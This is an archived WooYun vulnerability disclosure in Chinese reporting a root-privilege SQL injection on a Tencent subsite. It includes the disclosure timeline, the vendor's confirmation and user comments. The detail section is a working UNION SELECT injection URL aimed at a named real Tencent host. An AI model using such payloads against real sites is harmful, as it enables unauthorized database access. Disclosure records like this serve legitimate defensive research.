当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016487

漏洞标题:腾讯某分站注入_ROOT权限,泄露系统重要信息

相关厂商:腾讯

漏洞作者: kobin97

提交时间:2012-12-25 15:54

修复时间:2013-02-08 15:55

公开时间:2013-02-08 15:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-12-25: 细节已通知厂商并且等待厂商处理中
2012-12-25: 厂商已经确认,细节仅向厂商公开
2013-01-04: 细节向核心白帽子及相关领域专家公开
2013-01-14: 细节向普通白帽子公开
2013-01-24: 细节向实习白帽子公开
2013-02-08: 细节向公众公开

简要描述:

腾讯某分站注入_ROOT权限,泄露系统重要信息

详细说明:

http://qrobot.qq.com/Products/index/id/4%20and%201=2%20union%20select%201,2,3,4,user%28%29--

.jpg


漏洞证明:

.jpg

修复方案:

不多说了。。。

版权声明:转载请注明来源 kobin97@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2012-12-25 17:25

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

2012-12-25:

2012-12-25:非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

2012-12-25:

2012-12-25:确认漏洞,级别选了高,给15分,点击提交后,为啥忽略了?建议wooyun给15分rank,再次感谢报告者。

漏洞评价:

评论

  1. 2012-12-25 16:04 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    今天是肿么了?

  2. 2012-12-25 16:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @Coody 上帝保佑圣诞节的宅男

  3. 2012-12-25 16:24 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @xsser 都在用自己的方式过节////谁能收了我呀/////

  4. 2012-12-25 16:41 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    宅男的小宇宙是不容忽视的,哈哈,今晚不当宅男咯~

  5. 2012-12-25 16:57 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    肿么忽略了呢?~百思不得其解啊

  6. 2012-12-25 17:09 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)

    今晚继续宅。宅男无视一切节。 我连自己的头几天生日都是在家里逛乌云过的,还去过他丫的什么外国人的节日么?

  7. 2012-12-25 17:14 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @xsser 表示我刚看到漏洞细节了、、、、、

  8. 2012-12-25 17:26 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Coody 一定是你做了太多的祈祷

  9. 2012-12-25 17:28 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Coody 表示你是内部人员我举报你

  10. 2012-12-25 17:32 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @疯子 腾讯内部?

  11. 2012-12-25 17:32 | DarkSun.Evil ( 路人 | Rank:14 漏洞数:2 | 请多关照...Thx...)

    唉,没看到啊,没看到! 真的要过剩蛋了!日

  12. 2012-12-25 17:32 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @疯狗 哈哈,或许吧。。。。

  13. 2012-12-25 17:33 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @疯子 @疯狗 你们看到厂商的最新状态就知道我怎么看到的,我可是无时无刻的都在关注 wooyun 哦、、、

  14. 2012-12-25 17:59 | 疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)

    @Coody 哦哦哦 开始忽略了的

  15. 2012-12-25 18:43 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    我表示,我也看到了。。

  16. 2012-12-25 22:29 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    把你今天搞我账号的洞放出来吧,真够狠心的!

  17. 2012-12-26 00:15 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @zeracker 透露一下

  18. 2012-12-26 00:15 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    @kobin97 这个玩内网渗透应该有点意思

  19. 2012-12-26 09:16 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @zeracker 你昨晚被爆菊了???

  20. 2012-12-28 20:27 | 小野 ( 路人 | Rank:6 漏洞数:2 | 低调~)

    求公开!

  21. 2013-02-08 20:23 | 神刀 ( 路人 | Rank:23 漏洞数:3 | www.shellsec.com内射那么牛,虾米没妹子?)

    腾讯的漏洞系统又增强不少了~